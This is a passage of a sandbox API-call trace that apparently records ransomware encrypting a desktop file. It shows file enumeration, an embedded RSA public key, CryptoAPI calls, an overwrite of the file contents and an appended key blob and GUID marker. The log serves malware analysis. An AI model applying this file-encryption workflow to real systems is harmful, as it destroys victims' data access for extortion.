dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.026] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56ecaea0, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xd544e6c0, ftLastAccessTime.dwHighDateTime=0x1d5e130, ftLastWriteTime.dwLowDateTime=0xd544e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e130, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.026] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe8870, ftCreationTime.dwHighDateTime=0x1d5d8f9, ftLastAccessTime.dwLowDateTime=0x609e9970, ftLastAccessTime.dwHighDateTime=0x1d5d7ca, ftLastWriteTime.dwLowDateTime=0x609e9970, ftLastWriteTime.dwHighDateTime=0x1d5d7ca, nFileSizeHigh=0x0, nFileSizeLow=0x100eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-RvZ.flv", cAlternateFileName="")) returned 1 [0233.026] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\-RvZ.flv") returned=".flv" [0233.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\-RvZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\-rvz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.027] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=65771) returned 1 [0233.027] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.030] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x100c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.030] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.032] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x100eb, lpOverlapped=0x0) returned 1 [0233.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.034] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0233.035] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.035] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.035] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.035] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.035] GetLastError () returned 0x0 [0233.035] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.035] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0233.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.035] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.035] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.035] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100f0) returned 0x37c2278 [0233.036] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb4b0 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2b0 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb4f8 [0233.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.037] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0233.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee310 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee2f8 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0233.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.038] GetCurrentThreadId () returned 0x314 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9740 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.039] GetCurrentThreadId () returned 0x314 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0233.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2e0 [0233.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee388 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee328 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0233.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0233.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb4f8 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.043] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x100e6, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x100e6, lpOverlapped=0x0) returned 1 [0233.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0233.044] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x100eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.044] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.045] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.045] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.045] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.045] CloseHandle (hObject=0x640) returned 1 [0233.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 